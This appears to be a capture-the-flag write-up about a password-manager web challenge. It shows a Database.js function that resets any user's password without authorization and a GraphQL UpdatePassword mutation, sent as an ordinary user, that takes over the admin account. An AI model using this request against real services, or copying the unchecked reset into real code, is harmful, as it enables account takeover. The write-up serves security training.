![Pasted image 20230324121711.png](../assets/Pasted%20image%2020230324121711.png)

Visit the address and there is a login panel for password manager.

![Pasted image 20230324121749.png](../assets/Pasted%20image%2020230324121749.png)

When i looked through source code there is a functionality for password reset with the username and new password as it's arguments without authentication of that account.

Database.js

````js
    async updatePassword(username, password) {
        return new Promise(async (resolve, reject) => {
            let stmt = `UPDATE users SET password = ? WHERE username = ?`;
            this.connection.query(
                stmt,
                [
                    String(password),
                    String(username)
                ],
                (err, _) => {
                    if(err)
                        reject(err)
                    resolve();
			    }
            )
        });
    }
````

The applcation is using the graphql api, let's understand how it is interacting with the backend by observing the login request.

![Pasted image 20230324122549.png](../assets/Pasted%20image%2020230324122549.png)

This is how graphql api sending the request to the backend.

````css
{"query":"mutation($username: String!, $password: String!) { LoginUser(username: $username, password: $password) { message, token } }","variables":{"username":"test","password":"test"}}
````

This json request is containing three keys `query`, and `variables`.
the `query` contains graphql mutation. (A Mutation is **a GraphQL Operation that allows you to insert new data or modify the existing data on the server-side**)
Which is calling a function `LoginUser` and passing arguments to its `username` and `password` parameters, which returns a status message and an access token.

![Pasted image 20230324123226.png](../assets/Pasted%20image%2020230324123226.png)

As the `UpdatePassword` function required a access token i needed to be login with the normal user account.

Replace `LoginUser` function with `UpdatePassword` with required arguments.

````css
{"query":"mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message, token } }","variables":{"username":"admin","password":"NewPassword"}}
````

![Pasted image 20230324125307.png](../assets/Pasted%20image%2020230324125307.png)

![Pasted image 20230324125404.png](../assets/Pasted%20image%2020230324125404.png)

Login with new admin credentials.

![Pasted image 20230321144315.png](../assets/Pasted%20image%2020230321144315.png)
